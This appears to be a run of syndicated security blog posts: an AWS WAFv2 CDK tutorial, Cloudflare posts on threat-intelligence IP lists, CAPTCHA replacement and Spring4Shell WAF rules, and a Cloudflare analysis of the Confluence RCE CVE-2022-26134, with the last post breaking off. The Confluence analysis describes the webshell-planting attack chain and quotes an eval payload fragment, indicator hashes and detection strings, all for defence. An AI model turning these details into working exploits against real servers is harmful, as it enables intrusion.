When AWS WAF is applied to Amazon CloudFront, Amazon API Gateway, Application Load Balancer, or AWS AppSync, it inspects and filters requests before they’re forwarded to your compute infrastructure.

Figure 1. AWS WAFv2 can protect endpoints built by Amazon CloudFront, Amazon API Gateway, Application Load Balancer and AWS AppSync

Given that you have an existing web application defined in AWS CDK, we want to add a WAFv2 web ACL to its entrypoint. Instead of writing our own firewall rules to inspect and filter requests, we want to leverage an AWS Managed Rules rule group. Simultaneously, we must be able to disable or reconfigure some of the rules in the case that they cause undesirable behavior in the application.

A good first rule group to use is the core rule set (CRS) managed rule group, also named AWSManagedRulesCommonRuleSet. It contains rules that are generally applicable to web applications and provides protection against exploitation of various vulnerabilities, such as the ones described in the OWASP Top 10. You can later add more managed rule groups or write your own rules, which are specific to your application (e.g., for Windows, Linux, or WordPress).

Define the AWS WAFv2 web ACL

First, let’s give the AWS WAF module a nicely readable name:

import { aws_wafv2 as wafv2 } from 'aws-cdk-lib';

Then, we define the AWS WAFv2 web ACL in AWS CDK:

const cfnWebACL = new wafv2.CfnWebACL(this, 'MyCDKWebAcl', {
      defaultAction: {
        allow: {}
      },
      scope: 'REGIONAL',
      visibilityConfig: {
        cloudWatchMetricsEnabled: true,
        metricName: 'MetricForWebACLCDK',
        sampledRequestsEnabled: true,
      },
      name: 'MyCDKWebAcl',
      rules: [{
        name: 'CRSRule',
        priority: 0,
        statement: {
          managedRuleGroupStatement: {
            name: 'AWSManagedRulesCommonRuleSet',
            vendorName: 'AWS'
          }
        },
        visibilityConfig: {
          cloudWatchMetricsEnabled: true,
          metricName: 'MetricForWebACLCDK-CRS',
          sampledRequestsEnabled: true,
        },
        overrideAction: {
          none: {}
        },
      }]
    });

The rules array above references the CRS managed rule group as one Rule in the list. You could add more Rule elements, either referencing managed rule groups or custom rules.

Note the scope attribute. If you want to attach this web ACL to an API Gateway, AWS AppSync API, or Application Load Balancer, then it will be REGIONAL. If you want to attach it to a CloudFront distribution, then make sure that your AWS WAFv2 web ACL is defined in the US East (N. Virginia) Region and the scope is CLOUDFRONT.

Attach the AWS WAFv2 web ACL to an Application Load Balancer, AWS AppSync API, or API Gateway

Now that we have a web ACL defined, we must attach it to a resource. This works exactly the same across API Gateway APIs, an AWS AppSync API, or an Application Load Balancer. We must create a CfnWebACLAssociation and point it to the previously created web ACL and the resource to protect:

const cfnWebACLAssociation = new wafv2.CfnWebACLAssociation(this,'MyCDKWebACLAssociation', {
      resourceArn:<ARN of resource to protect>,
      webAclArn:cfnWebACL.attrArn,
    });

Amazon Resource Names (ARNs) uniquely identify AWS resources. The webAclArn line shows how AWS CDK lets you get the ARN of the previously defined CfnWebACL through its attrArn attribute.

Depending on what type of service you’re using, jump to one of the three following sections to learn how to retrieve the resourceArn of API Gateway, AWS AppSync, or Application Load Balancers.

Retrieving ARN for AWS AppSync APIs

To retrieve the ARN of an AWS AppSync API, call the .arn property:

const api = new appsync.GraphqlApi(…)
const cfnWebACLAssociation = new wafv2.CfnWebACLAssociation(this,'MyCDKWebACLAssociation', {
      resourceArn:api.arn,
      webAclArn: cfnWebACL.attrArn,
    });

Retrieving ARN for Amazon API Gateway REST APIs

In this case, we must specify which stage of the REST API we want to protect with the web ACL. Then, we reference the ARN of the stage:

const api = new apigateway.RestApi(…)
const deployment = new apigateway.Deployment(…)
const stage = new apigateway.Stage(…)
const cfnWebACLAssociation = new wafv2.CfnWebACLAssociation(this,'MyCDKWebACLAssociation', {
      resourceArn:stage.stageArn,
      webAclArn: cfnWebACL.attrArn,
    });

Retrieving ARN for Application Load Balancers

If you’re dealing with an Application Load Balancer, then this is how you can retrieve its ARN:

const lb = new elbv2.ApplicationLoadBalancer(…)

const cfnWebACLAssociation = new wafv2.CfnWebACLAssociation(this,'MyCDKWebACLAssociation', {
      resourceArn:lb.loadBalancerArn,
      webAclArn: cfnWebACL.attrArn,
    });

Attach the AWS WAFv2 web ACL to a CloudFront distribution

Attaching a web ACL to CloudFront follows a different approach. Instead of defining a cfnWebACLAssociation, we reference the web ACL inside of the Distribution definition:

const distribution = new cloudfront.Distribution(this,'distro', {
      defaultBehavior: {
        origin: new origins.S3Origin(s3Bucket)
      },
     webAclId:cfnWebACL.attrArn
    });

Note that even though the property is called webAclId, because we’re using AWS WAFv2, we must supply the ARN of the web ACL.

Exclude rules from the web ACL

Lastly, let’s understand how we can customize the web ACL further. If a rule of the managed rule group causes undesired behavior in the application, then we can exclude it from the webACL. Assume that we want to exclude the SizeRestrictions_BODY rule, which limits the request body size to 8 KB.

Go back to the definition of the web ACL, and add the excludedRules property shown below:

const cfnWebACL = new wafv2.CfnWebACL(this, 'MyCDKWebAcl', {
      defaultAction: {
        allow: {}
      },
      scope: 'REGIONAL',
      visibilityConfig: {
        cloudWatchMetricsEnabled: true,
        metricName: 'MetricForWebACLCDK',
        sampledRequestsEnabled: true,
      },
      name: 'MyCDKWebAcl',
      rules: [{
        name: 'CRSRule',
        priority: 0,
        statement: {
          managedRuleGroupStatement: {
            name: 'AWSManagedRulesCommonRuleSet',
            vendorName: 'AWS',
            excludedRules: [{
              name: 'SizeRestrictions_BODY'
            }]
          }
        },
        visibilityConfig: {
          cloudWatchMetricsEnabled: true,
          metricName: 'MetricForWebACLCDK-CRS',
          sampledRequestsEnabled: true,
        },
        overrideAction: {
          none: {}
        },
      }]
    });

Other customizations you can do include pinning the version of the rule group and narrowing the scope of the requests that the rule evaluates, using scope-down statements.
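
For reference, both customizations are properties of the managedRuleGroupStatement. The sketch below is illustrative: the version string is a placeholder (use one of the versions listed for the rule group in your account), and the scope-down statement only evaluates the rule group for URI paths starting with /api/:

statement: {
  managedRuleGroupStatement: {
    name: 'AWSManagedRulesCommonRuleSet',
    vendorName: 'AWS',
    // Pin a specific rule group version instead of tracking the default.
    version: 'Version_1.3', // placeholder
    // Narrow the rule group to requests whose URI path starts with /api/.
    scopeDownStatement: {
      byteMatchStatement: {
        searchString: '/api/',
        fieldToMatch: { uriPath: {} },
        positionalConstraint: 'STARTS_WITH',
        textTransformations: [{ priority: 0, type: 'NONE' }],
      },
    },
  }
},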

Conclusion

In this post, you’ve seen how an AWS WAFv2 web ACL can be added to your existing infrastructure defined in AWS CDK. By using Managed Rules, your application benefits from a layer of protection that is curated and maintained by AWS security experts.

As a next step, you can learn how to include AWS WAFv2 metrics from Amazon CloudWatch into your application dashboards. This will give you perspective on how your web application is performing in conjunction with the AWS WAFv2 web ACL.

To learn more about AWS WAFv2 and how to manage web ACLs, check out the official developer guide.

About the author:

Ramon Lopez

Ramon is a Senior Solutions Architect at AWS, where he guides, educates, and empowers customers of all sizes and industries to build successful businesses in the AWS cloud. He also built web services for 150+ million Amazon Prime customers and led a team of software engineers in a fast-paced global environment. After being immersed in one of the largest micro-service environments, he is a believer in the DevOps mantra of “You build it, you run it”.

New WAF intelligence feeds

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/new-waf-intelligence-feeds/

Cloudflare is expanding our WAF’s threat intelligence capabilities by adding four new managed IP lists that can be used as part of any custom firewall rule.

Managed lists are created and maintained by Cloudflare and are built based on threat intelligence feeds collected by analyzing patterns and trends observed across the Internet. Enterprise customers can already use the Open SOCKS Proxy list (launched in March 2021) and today we are adding four new IP lists: “VPNs”, “Botnets, Command and Control Servers”, “Malware” and “Anonymizers”.

[Screenshot: available managed IP lists in the Cloudflare dashboard]
You can check which lists are available in your plan by navigating to Manage Account → Configuration → Lists.

Customers can reference these lists when creating a custom firewall rule or in Advanced Rate Limiting. For example, you can choose to block all traffic generated by IPs we categorize as VPNs, or rate limit traffic generated by all Anonymizers. You can simply incorporate managed IP lists in the powerful firewall rule builder. Of course, you can also use your own custom IP list.
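
For example, the following hedged sketch creates such a rule through Cloudflare’s v4 Firewall Rules API; the zone ID and API token are placeholders, and the $cf.anonymizer list name is illustrative (check the Lists page for the exact names available on your account):

const zoneId = 'YOUR_ZONE_ID';     // placeholder
const apiToken = 'YOUR_API_TOKEN'; // placeholder

// Create a firewall rule that blocks traffic from a managed IP list.
await fetch(`https://api.cloudflare.com/client/v4/zones/${zoneId}/firewall/rules`, {
  method: 'POST',
  headers: {
    Authorization: `Bearer ${apiToken}`,
    'Content-Type': 'application/json',
  },
  body: JSON.stringify([
    {
      description: 'Block anonymizer traffic',
      action: 'block',
      filter: { expression: '(ip.src in $cf.anonymizer)' }, // illustrative list name
    },
  ]),
});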

[Screenshot: using a managed IP list in the firewall rule builder]
Managed IP Lists can be used in WAF rules to manage incoming traffic from these IPs.

Where do these feeds come from?

These lists are based on Cloudflare-generated threat feeds which are made available as IP lists to be easily consumed in the WAF. Each IP is categorized by combining open source data with an analysis of the behavior of each IP, leveraging the scale and reach of Cloudflare’s network. After an IP has been included in one of these feeds, we verify its categorization, feed this information back into our security systems, and make it available to our customers in the form of a managed IP list. The content of each list is updated multiple times a day.

In addition to generating IP classifications based on Cloudflare’s internal data, Cloudflare curates and combines several data sources that we believe provide reliable coverage of active security threats with a low false positive rate. In today’s environment, an IP belonging to a cloud provider might be distributing malware today, but tomorrow might be a critical resource for your company.

Some IP address classifications are publicly available OSINT data, for example Tor exit nodes, and Cloudflare takes care of integrating these into our Anonymizer list so that you don’t have to integrate such lists into every asset in your network. Other classifications are determined or vetted using a variety of DNS techniques, such as lookups, PTR record lookups, and observing passive DNS from Cloudflare’s network.
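
As a simplified illustration of this kind of vetting, forward-confirmed reverse DNS checks whether an IP’s PTR hostname resolves back to the same IP. A sketch using Node’s standard dns module (not Cloudflare’s actual tooling):

import { promises as dns } from 'node:dns';

// Forward-confirmed reverse DNS: does the IP's PTR hostname
// resolve back to the same IP?
async function fcrdns(ip: string): Promise<boolean> {
  try {
    const hostnames = await dns.reverse(ip); // PTR record lookup
    for (const host of hostnames) {
      const { address } = await dns.lookup(host); // forward lookup
      if (address === ip) return true;
    }
  } catch {
    // no PTR record, or lookup failed
  }
  return false;
}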

Our malware and command-and-control focused lists are generated from curated partnerships; one type of data source we target when selecting partners is those that identify security threats with no DNS records associated with them.

Our Anonymizer list encompasses several types of services that perform anonymization, including VPNs, open proxies, and Tor nodes. It is a superset of the more narrowly focused VPN list (known commercial VPN nodes), and the Cloudflare Open Proxies list (proxies that relay traffic without requiring authentication).

In dashboard IP annotations

Using these lists to deploy a preventative security policy for these IPs is great, but what about knowing if an IP that is interacting with your website or application is part of a Botnet or VPN? We first released contextual information for Anonymizers as part of Security Week 2022, but we are now closing the circle by extending this feature to cover all new lists.

As part of Cloudflare’s threat intelligence feeds, we are exposing the IP category directly in the dashboard. Say you are investigating requests that were blocked by the WAF and that looked to be probing your application for known software vulnerabilities. If the source IP of these requests matches one of our feeds (for example, is part of a VPN), contextual information will appear directly on the analytics page.

[Screenshot: contextual IP information shown for a WAF event in the Cloudflare dashboard]
When the source IP of a WAF event matches one of the threat feeds, we provide contextual information directly onto the Cloudflare dashboard.

This information can help you see patterns and decide whether you need to use the managed lists to handle the traffic from these IPs in a particular way, for example by creating a rate limiting rule that reduces the amount of requests these actors can perform over a period of time.

Who gets this?

The following table summarizes which plans have access to each of these features. All paying plans have access to the contextual in-dash information, while Enterprise plans can use the different managed lists. Managed lists can be used only on Enterprise zones within an Enterprise account.

                                FREE   PRO   BIZ   ENT   Advanced ENT *
Annotations                     ✘      ✓     ✓     ✓     ✓
Open Proxies                    ✘      ✘     ✘     ✓     ✓
Anonymizers                     ✘      ✘     ✘     ✘     ✓
VPNs                            ✘      ✘     ✘     ✘     ✓
Botnets, Command and Control    ✘      ✘     ✘     ✘     ✓
Malware                         ✘      ✘     ✘     ✘     ✓

* Contact your customer success manager to learn how to get access to these lists.

Future releases

We are working on enriching our threat feeds even further. In the coming months we are going to provide more IP lists; specifically, we are looking into lists for cloud providers and Carrier-Grade Network Address Translation (CG-NAT).

Cloudflare observations of Confluence zero day (CVE-2022-26134)

Post Syndicated from Vaibhav Singhal original https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/

On 2022-06-02 at 20:00 UTC, Atlassian released a Security Advisory relating to a remote code execution (RCE) vulnerability affecting Confluence Server and Confluence Data Center products. This post covers our current analysis of this vulnerability.

When we learned about the vulnerability, Cloudflare’s internal teams immediately engaged to ensure all our customers and our own infrastructure were protected:

  • Our Web Application Firewall (WAF) teams started work on our first mitigation rules that were deployed on 2022-06-02 at 23:38 UTC for all customers.
  • Our internal security team started reviewing our Confluence instances to ensure Cloudflare itself was not impacted.

What is the impact of this vulnerability?

According to Volexity, the vulnerability results in full unauthenticated RCE, allowing an attacker to fully take over the target application.

Active exploits of this vulnerability leverage command injections using specially crafted strings to load a malicious class file in memory, allowing attackers to subsequently plant a webshell on the target machine that they can interact with.

Once the vulnerability is exploited, attackers can implant additional malicious code such as Behinder; a custom webshell called noop.jsp, which replaces the legitimate noop.jsp file located at <Confluence root>/confluence/noop.jsp; and another open source webshell called Chopper.

Our observations of exploit attempts in the wild

Once we learned of the vulnerability, we began reviewing our WAF data to identify activity related to exploitation of the vulnerability. We identified requests matching potentially malicious payloads as early as 2022-05-26 00:33 UTC, indicating that some attackers had knowledge of the exploit before the Atlassian security advisory.

Since our mitigation rules were put in place, we have seen a large spike in activity starting from 2022-06-03 10:30 UTC — a little more than 10 hours after the new WAF rules were first deployed. This large spike coincides with the increased awareness of the vulnerability and release of public proof of concepts. Attackers are actively scanning for vulnerable applications at time of writing.

[Graph: WAF rule matches related to CVE-2022-26134 over time]

Although we have seen valid attack payloads since 2022-05-26, many payloads that started matching our initial WAF mitigation rules once the advisory was released were not valid against this specific vulnerability. Examples provided below:

[Image: examples of invalid payloads matched by the initial WAF mitigation rules]

The activity above indicates that actors were using scanning tools to try and identify the attack vectors. Exact knowledge of how to exploit the vulnerability may have been consolidated amongst select attackers and may not have been widespread.

The decline in WAF rule matches in the graph above after 2022-06-03 23:00 UTC is due to us releasing improved WAF rules. The new, updated rules greatly improved accuracy, reducing the number of false positives, such as the examples above.

A valid malicious URL targeting a vulnerable Confluence application is shown below:

[Figure: a valid malicious URL targeting a vulnerable Confluence application]

(Where $HOSTNAME is the host of the target application.)

The URL above runs the contents of the HTTP POST body, eval(#parameters.data[0]). Normally this will be a script that downloads a webshell to the local server, allowing the attacker to run arbitrary code on demand.

Other example URLs, omitting the schema and hostname, include:

[Figure: further example exploit URLs, schema and hostname omitted]

Some of the activity we are observing is indicative of malware campaigns and botnet behavior. It is important to note that, given the payload structure, other WAF rules have also been effective at mitigating particular variations of the attack, including rules PHP100011 and PLONE0002.

Cloudflare’s response to CVE-2022-26134

We have a defense-in-depth approach which uses Cloudflare to protect Cloudflare. We had high confidence that we were not impacted by this vulnerability due to the security measures in place. We confirmed this by leveraging our detection and response capabilities to sweep all of our internal assets and logs for signs of attempted compromise.

The main actions we took in response to this incident were:

  1. Gathered as much information as possible about the attack.
  2. Engaged our WAF team to start working on mitigation rules for this CVE.
  3. Searched our logs for any signs of compromise.
  4. Searched the logs from our internal Confluence instances for any signs of attempted exploits, supplementing our assessment with the pattern string provided by Atlassian: “${“.
  5. Reviewed any matches to determine whether they were actual exploits. We found no signs that our systems were targeted by actual exploits.
  6. Deployed the new rules to all our servers as soon as the WAF team was confident of their quality, protecting our customers as quickly as possible. As we also use the WAF for our internal systems, our Confluence instances are also protected by the new WAF rules.
  7. Scrutinized our Confluence servers for signs of compromise and the presence of malicious implants. No signs of compromise were detected.
  8. Deployed rules to our SIEM and monitoring systems to detect any new exploitation attempts against our Confluence instances.

How Cloudflare uses Confluence

Cloudflare uses Confluence internally as our main wiki platform. Many of our teams use Confluence as their main knowledge-sharing platform. Our internal instances are protected by Cloudflare Access. In previous blog posts, we described how we use Access to protect internal resources. This means that every request sent to our Confluence servers must be authenticated and validated in accordance with our Access policies. No unauthenticated access is allowed.

This allowed us to be confident that only Cloudflare users are able to submit requests to our Confluence instances, thus reducing the risk of external exploitation attempts.

What to do if you are using Confluence on-prem

If you are an Atlassian customer using their on-prem products, you should patch to the latest fixed versions. We advise the following actions:

  1. Add Cloudflare Access as an extra protection layer for all your websites. Easy-to-follow instructions to enable Cloudflare Access are available here.
  2. Enable a WAF that includes protection for CVE-2022-26134 in front of your Confluence instances. For more information on how to enable Cloudflare’s WAF and other security products, check here.
  3. Check the logs from your Confluence instances for signs of exploitation attempts. Look for the strings /wiki/ and ${ in the same request (a sketch of such a search is shown after this list).
  4. Use forensic tools and check for signs of post-exploitation tools such as webshells or other malicious implants.
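
For step 3, a minimal log-scanning sketch in Java (it assumes a plain-text access log with one request per line; adapt the path and pattern to your own log format):

import java.nio.file.*;
import java.util.regex.Pattern;

public class ConfluenceLogScan {
    // Flag lines containing "/wiki/" followed by "${" anywhere in the request.
    private static final Pattern SUSPICIOUS = Pattern.compile("/wiki/.*\\$\\{");

    public static void main(String[] args) throws Exception {
        // args[0] is the path to the access log to scan.
        Files.lines(Path.of(args[0]))
             .filter(line -> SUSPICIOUS.matcher(line).find())
             .forEach(System.out::println);
    }
}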

Indicators of compromise and attack

The following indicators are associated with activity observed in the wild by Cloudflare, as described above. You can search your logs for these indicators to determine whether your environment was compromised via the Confluence vulnerability.

Indicators of Compromise (IOC)

  1. File: 45.64.json, SHA-256 50f4595d90173fbe8b85bd78a460375d8d5a869f1fef190f72ef993c73534276 (malicious file associated with the exploit)
  2. File: 45.64.rar, SHA-256 b85c16a7a0826edbcddbd2c17078472169f8d9ecaa7209a2d3976264eb3da0cc (malicious file associated with the exploit)
  3. File: 45.640.txt, SHA-256 90e3331f6dd780979d22f5eb339dadde3d9bcf51d8cb6bfdc40c43d147ecdc8c (malicious file associated with the exploit)
  4. File: 45.647.txt, SHA-256 1905fc63a9490533dc4f854d47c7cb317a5f485218173892eafa31d7864e2043 (malicious file associated with the exploit)
  5. File: lan (Perl script), SHA-256 5add63588480287d1aee01e8dd267340426df322fe7a33129d588415fd6551fc (malicious file associated with the exploit)
  6. File: jui.sh, SHA-256 67c2bae1d5df19f5f1ac07f76adbb63d5163ec2564c4a8310e78bcb77d25c988 (malicious file associated with the exploit)
  7. File: conf, SHA-256 281a348223a517c9ca13f34a4454a6fdf835b9cb13d0eb3ce25a76097acbe3fb (malicious file associated with the exploit)

Indicators of Attack (IOA)

  1. URL string: ${ (used to craft malicious payloads)
  2. URL string: javax.script.ScriptEngineManager (indicative of the ScriptEngineManager being used to craft malicious payloads)

The end of the road for Cloudflare CAPTCHAs

Post Syndicated from Reid Tatoris original https://blog.cloudflare.com/end-cloudflare-captcha/

The end of the road for Cloudflare CAPTCHAs

The end of the road for Cloudflare CAPTCHAs

There is no point in rehashing the fact that CAPTCHA provides a terrible user experience. It’s been discussed in detail before on this blog, and countless times elsewhere. One of the creators of the CAPTCHA has publicly lamented that he “unwittingly created a system that was frittering away, in ten-second increments, millions of hours of a most precious resource: human brain cycles.” We don’t like them, and you don’t like them.

So we decided we’re going to stop using CAPTCHAs. Using an iterative platform approach, we have already reduced the number of CAPTCHAs we choose to serve by 91% over the past year.

Before we talk about how we did it, and how you can help, let’s first start with a simple question.

Why in the world is CAPTCHA still used anyway?

If everyone agrees CAPTCHA is so bad, if there have been calls to get rid of it for 15 years, if the creator regrets creating it, why is it still widely used?

The frustrating truth is that CAPTCHA remains an effective tool for differentiating real human users from bots, despite the existence of CAPTCHA-solving services. Of course, this comes with a huge trade-off in terms of usability, but generally the alternatives to CAPTCHA are blocking or allowing traffic outright, which inherently increases either false positives or false negatives. With a choice between increased errors and a poor user experience (CAPTCHA), many sites choose CAPTCHA.

CAPTCHAs are also a safe choice because so many other sites use them. They delegate abuse response to a third party, and remove the risk from the website with a simple integration. Using the most common solution will rarely get you into trouble. Plug, play, forget.

Lastly, CAPTCHA is useful because it has a long history and a known, stable baseline. We’ve tracked a metric called CAPTCHA (or Challenge) Solve Rate for many years. CAPTCHA solve rate is the number of CAPTCHAs solved, divided by the number of page loads; for example, 100 solves across 10,000 challenged page loads is a 1% solve rate. For our purposes, both failing and not attempting to solve the CAPTCHA count as failures, since in either case a user cannot access the content they want. We find this metric to typically be stable for any particular website. That is, if the solve rate is 1%, it tends to remain at 1% over time. We also find that any change in solve rate – up or down – is a strong indicator of an attack in progress. Customers can monitor the solve rate and create alerts to notify them when it changes, then investigate what might be happening.

Many alternatives to CAPTCHA have been tried, including our own Cryptographic Attestation. However, to date, none have seen the amount of widespread adoption of CAPTCHAs. We believe attempting to replace CAPTCHA with a single alternative is the main reason why. When you replace CAPTCHA, you lose the stable history of the solve rate, and making decisions becomes more difficult. If you switch from deciphering text to picking images, you will get vastly different results. How do you know if those results are good or bad? So, we took a different approach.

Many solutions, not one

Rather than try to unilaterally deprecate and replace CAPTCHA with a single alternative, we built a platform to test many alternatives and see which had the best potential to replace CAPTCHA. We call this Cloudflare Managed Challenge.

[Figure: overview of Cloudflare Managed Challenge]

Managed Challenge is a smarter solution than CAPTCHA. It defers the decision about whether to serve a visual puzzle to a later point in the flow, after more information is available from the browser. Previously, a Cloudflare customer could only choose between a CAPTCHA and a JavaScript Challenge as the action of a security or firewall rule. Now, the Managed Challenge option decides whether to show a visual puzzle or another means of proving humanness, based on the client behavior exhibited during a challenge and on the telemetry we receive from the visitor. A customer simply tells us, “I want you (Cloudflare) to take appropriate actions to challenge this type of traffic as you see necessary.”

With Managed Challenge, we adapt the actual challenge outcome to the individual visitor/browser. As a result, we can fine-tune the difficulty of the challenge itself and avoid showing visual puzzles to more than 90% of human requests, while at the same time presenting harder challenges to visitors that exhibit non-human behaviors.

When a visitor encounters a Managed Challenge, we first run a series of small non-interactive JavaScript challenges gathering more signals about the visitor/browser environment. This means we deploy in-browser detections and challenges at the time the request is made. Challenges are selected based on what characteristics the visitor emits and based on the initial information we have about the visitor. Those challenges include, but are not limited to, proof-of-work, proof-of-space, probing for web APIs, and various challenges for detecting browser-quirks and human behavior.

They also include machine learning models that detect common features of end visitors who were able to pass a CAPTCHA before. The computational hardness of those initial challenges may vary by visitor, but is targeted to run fast. Managed Challenge is also integrated into the Cloudflare Bot Management and Super Bot Fight Mode systems by consuming signals and data from the bot detections.
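
Cloudflare has not published the internals of these challenges, but as a rough sketch of the general shape of a browser proof-of-work task (purely illustrative, not Cloudflare's implementation), the client searches for a nonce that makes a hash meet a difficulty target:

import java.security.MessageDigest;
import java.nio.charset.StandardCharsets;

public class PowSketch {
    // Find a nonce whose SHA-256 hash of (seed + nonce) starts with two zero bytes.
    public static long solve(String seed) throws Exception {
        MessageDigest sha = MessageDigest.getInstance("SHA-256");
        for (long nonce = 0; ; nonce++) {
            byte[] h = sha.digest((seed + nonce).getBytes(StandardCharsets.UTF_8));
            if (h[0] == 0 && h[1] == 0) return nonce; // ~1 in 65,536 hashes on average
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(solve("challenge-seed"));
    }
}

The work is cheap for a single human visitor but adds up quickly for a bot issuing requests at scale, which is what makes this family of challenges useful as a non-interactive signal.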

After our non-interactive challenges have been run, we evaluate the gathered signals. If the combination of those signals gives us confidence that the visitor is likely human, no further action is taken, and the visitor is redirected to their destination page without any interaction required. However, in some cases, if the signal is weak, we present a visual puzzle to the visitor to prove their humanness. In the context of Managed Challenge, we’re also experimenting with other privacy-preserving means of attesting humanness, to continue reducing the portion of time that Managed Challenge uses a visual puzzle step.

We started testing Managed Challenge last year, and initially, we chose from a rotating subset of challenges, one of them being CAPTCHA. At the start, CAPTCHA was still used in the vast majority of cases. We compared the solve rate for the new challenge in question, with the existing, stable solve rate for CAPTCHA. We thus used CAPTCHA solve rate as a goal to work towards as we improved our CAPTCHA alternatives, getting better and better over time. The challenge platform allows our engineers to easily create, deploy, and test new types of challenges without impacting customers. When a challenge turns out to not be useful, we simply deprecate it. When it proves to be useful, we increase how often it is used. In order to preserve ground-truth, we also randomly choose a small subset of visitors to always solve a visual puzzle to validate our signals.

Managed Challenge performs better than CAPTCHA

The Challenge Platform now has the same stable solve rate as previously used CAPTCHAs.

[Figure: Managed Challenge solve rate matching the historical CAPTCHA solve rate]

Using an iterative platform approach, we have reduced the number of CAPTCHAs we serve by 91%. This is only the start. By the end of the year, we will reduce our use of CAPTCHA as a challenge to less than 1%. By skipping the visual puzzle step for almost all visitors, we are able to reduce the visitor time spent in a challenge from an average of 32 seconds to an average of just one second to run our non-interactive challenges. We also see churn improvements: our telemetry indicates that visitors with human properties are 31% less likely to abandon a Managed Challenge than on the traditional CAPTCHA action.

Today, the Managed Challenge platform rotates between many challenges. A Managed Challenge instance consists of many sub-challenges: some of them are established and effective, whereas others are new challenges we are experimenting with. All of them are much, much faster and easier for humans to complete than CAPTCHA, and almost always require no interaction from the visitor.

Managed Challenge replaces CAPTCHA for Cloudflare

We have now deployed Managed Challenge across the entire Cloudflare network. Any time we show a CAPTCHA to a visitor, it’s via the Managed Challenge platform, and only as a benchmark to confirm our other challenges are performing as well.

All Cloudflare customers can now choose Managed Challenge as a response option to any Firewall rule instead of CAPTCHA. We’ve also updated our dashboard to encourage all Cloudflare customers to make this choice.

[Figure: the Managed Challenge response option in the dashboard]

You’ll notice that we changed the name of the CAPTCHA option to ‘Legacy CAPTCHA’. This more accurately describes what CAPTCHA is: an outdated tool that we don’t think people should use. As a result, the usage of CAPTCHA across the Cloudflare network has dropped significantly, and usage of Managed Challenge has increased dramatically.

[Figure: CAPTCHA usage dropping and Managed Challenge usage rising across the Cloudflare network]

As noted above, today CAPTCHA represents 9% of Managed Challenge solves (light blue), but that number will decrease to less than 1% by the end of the year. You’ll also see the gray bar above, which shows when our customers have chosen to show a CAPTCHA as a response to a Firewall rule triggering. We want that number to go to zero, but the good news is that 63% of customers now choose Managed Challenge rather than CAPTCHA when they create a Firewall rule with a challenge response action.

[Figure: share of challenge Firewall rules using Managed Challenge versus CAPTCHA]

We expect this number to increase further over time.

If you’re using the Cloudflare WAF, log into the Dashboard today and look at all of your Firewall rules. If any of your rules are using “Legacy CAPTCHA” as a response, please change it now! Select the “Managed Challenge” response option instead. You’ll give your users a better experience, while maintaining the same level of protection you have today. If you’re not currently a Cloudflare customer, stay tuned for ways you can reduce your own use of CAPTCHA.

WAF mitigations for Spring4Shell

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/waf-mitigations-sping4shell/

WAF mitigations for Spring4Shell

WAF mitigations for Spring4Shell

A set of high profile vulnerabilities, generally referred to as Spring4Shell, has been identified affecting the popular Java Spring Framework and related software components.

Four CVEs have been released so far and are being actively updated as new information emerges. In the worst case, these vulnerabilities can result in full remote code execution (RCE) compromise. Each CVE is covered in its own section below.

Customers using Java Spring and related software components, such as the Spring Cloud Gateway, should immediately review their software and update to the latest versions by following the official Spring project guidance.

The Cloudflare WAF team is actively monitoring these CVEs and has already deployed a number of new managed mitigation rules. Customers should review the rules listed below to ensure they are enabled while also patching the underlying Java Spring components.

CVE-2022-22947

A new rule has been developed and deployed for this CVE with an emergency release on March 29:

Managed Rule Spring – CVE:CVE-2022-22947

  • WAF rule ID: e777f95584ba429796856007fbe6c869
  • Legacy rule ID: 100522

Note that the above rule is disabled by default and may cause some false positives. We advise customers to review rule matches or to deploy the rule with a LOG action before switching to BLOCK.

CVE-2022-22950

Currently, available PoCs are blocked by the following rule:

Managed Rule PHP – Code Injection

  • WAF rule ID: 55b100786189495c93744db0e1efdffb
  • Legacy rule ID: PHP100011

CVE-2022-22963

Currently, available PoCs are blocked by the following rule:

Managed Rule Plone – Dangerous File Extension

  • WAF rule ID: aa3411d5505b4895b547d68950a28587
  • Legacy WAF ID: PLONE0001

We also deployed a new rule via an emergency release on March 31 (today at time of writing) to cover additional variations attempting to exploit this vulnerability:

Managed Rule Spring – Code Injection

  • WAF rule ID: d58ebf5351d843d3a39a4480f2cc4e84
  • Legacy WAF ID: 100524

Note that the newly released rule is disabled by default and may cause some false positives. We advise customers to review rule matches or to deploy the rule with a LOG action before switching to BLOCK.

Additionally, customers can receive protection against this CVE by deploying the Cloudflare OWASP Core Ruleset with default or better settings on our new WAF. Customers using our legacy WAF will have to configure a high OWASP sensitivity level.

CVE-2022-22965

We are currently investigating this recent CVE and will provide an update to our Managed Ruleset as soon as possible if an applicable mitigation strategy or bypass is found. Please review and monitor our public facing change log.

WAF for everyone: protecting the web from high severity vulnerabilities

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/waf-for-everyone/

WAF for everyone: protecting the web from high severity vulnerabilities

WAF for everyone: protecting the web from high severity vulnerabilities

At Cloudflare, we like disruptive ideas. Pair that with our core belief that security is something that should be accessible to everyone and the outcome is a better and safer Internet for all.

This isn’t idle talk. For example, back in 2014, we announced Universal SSL. Overnight, we provided SSL/TLS encryption to over one million Internet properties without anyone having to pay a dime, or configure a certificate. This was good not only for our customers, but also for everyone using the web.

In 2017, we announced unmetered DDoS mitigation. We’ve never asked customers to pay for DDoS bandwidth as it never felt right, but it took us some time to reach the network size where we could offer completely unmetered mitigation for everyone, paying customer or not.

Still, I often get the question: how do we do this? It’s simple really. We do it by building great, efficient technology that scales well—and this allows us to keep costs low.

Today, we’re doing it again, by providing a Cloudflare WAF (Web Application Firewall) Managed Ruleset to all Cloudflare plans, free of charge.

Why are we doing this?

High profile vulnerabilities have a major impact across the Internet affecting organizations of all sizes. We’ve recently seen this with Log4J, but even before that, major vulnerabilities such as Shellshock and Heartbleed have left scars across the Internet.

Small application owners and teams don’t always have the time to keep up with fast-moving, security-related patches, leaving many applications compromised and/or used for nefarious purposes.

With millions of Internet properties behind the Cloudflare proxy, we have a duty to help keep the web safe. And that is what we did with Log4J by deploying mitigation rules for all traffic, including FREE zones. We are now formalizing our commitment by providing a Cloudflare Free Managed Ruleset to all plans on top of our new WAF engine.

When are we doing this?

